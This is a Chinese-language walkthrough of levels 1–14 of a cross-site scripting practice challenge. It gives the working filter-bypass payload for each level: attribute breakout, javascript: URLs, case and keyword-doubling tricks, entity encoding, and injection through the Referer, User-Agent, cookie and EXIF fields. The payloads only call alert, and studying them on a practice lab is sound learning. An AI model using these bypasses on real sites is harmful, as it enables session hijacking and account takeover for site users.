XSS挑战之旅 解题记录
本文記錄xss挑戰(zhàn)解題,檢驗自己的xss技術
題目鏈接
Level1
鏈接為http://test.xss.tv/level1.php?name=test
頁面沒有輸入點
直接構造payloadname=<script>alert(1)</script>
Level2
一樣簡單,給出payload"><script>alert(1)</script>
Level3
過濾了尖括號
故用`’ οnclick=alert(1)//
Level4
和L3一樣,不同的是這里用雙引號閉合
" onclick=alert(1)//
Level5
用上面的進行嘗試,發(fā)現(xiàn)將onclick變成o_nclick
這里改用添加鏈接方式
"><a href="javascript:alert(1)">
然后點擊鏈接即可
Level6
這里也將href過濾成hr_ef
這里用大小寫繞過過濾
"><a hrEf="javascript:alert(1)">
Level7
這里直接將href script刪除
于是采用機智方法
"><a hrhrefef="javascrscriptipt:alert(1)">
Level8
這里可以添加鏈接到頁面
于是直接javascript:alert(1)
但是不行因為會將script過濾成scr_ipt
這里采用HTML字符實體轉換
將script轉化成script
最后payload javascript:alert(1)
Level9
使用上關的payload,被提示不合法,說明對鏈接進行了格式要求
這里嘗試了很多次,最后看到網上的解答,吐血
因為這里只需要有http://即可
javascript:alert("http://")
值得一提的是雙引號會被過濾,于是第一個雙引號用實體轉換機即可
Level10
看源碼,發(fā)現(xiàn)有幾個type=hidden的輸入框
于是使其顯示并可以onclick觸發(fā)事件
http://test.xss.tv/level10.php?t_sort=4" onclick=alert(1) type="text"
Level11
看源碼,有個是顯示referer
<input name="t_ref" value="http://test.xss.tv/level10.php?t_sort=4%22%20onclick=alert(1)%20type=%22text%22" type="hidden">
這里也是嘗試很多次,但是始終無法使得輸入框改變type
最后百度得出要抓包改referer即可
修改referer=12356" onclick=alert(1) type=text
Level12
和上一關類似,這次修改user-agent
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" onclick=alert(1) type="text"
Level13
看網頁源碼有個輸入框叫cook,故去看看cookie
果然有個cookie值為call me maybe
修改cookiecall me maybe?" onclick=alert(1) type="text"
Level14
這里也是沒思緒
百度得出答案,這里用的是烏云爆出的exif viewer的漏洞
修改圖片exif信息如標題、作者' "><img src=1 onerror=alert(document.domain)>即可
之后第15關的鏈接失效了,就沒做下去了
總結
以上是生活随笔為你收集整理的XSS挑战之旅 解题记录的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 最深的红尘里,陌上为谁花开
- 下一篇: JSON格式化工具下载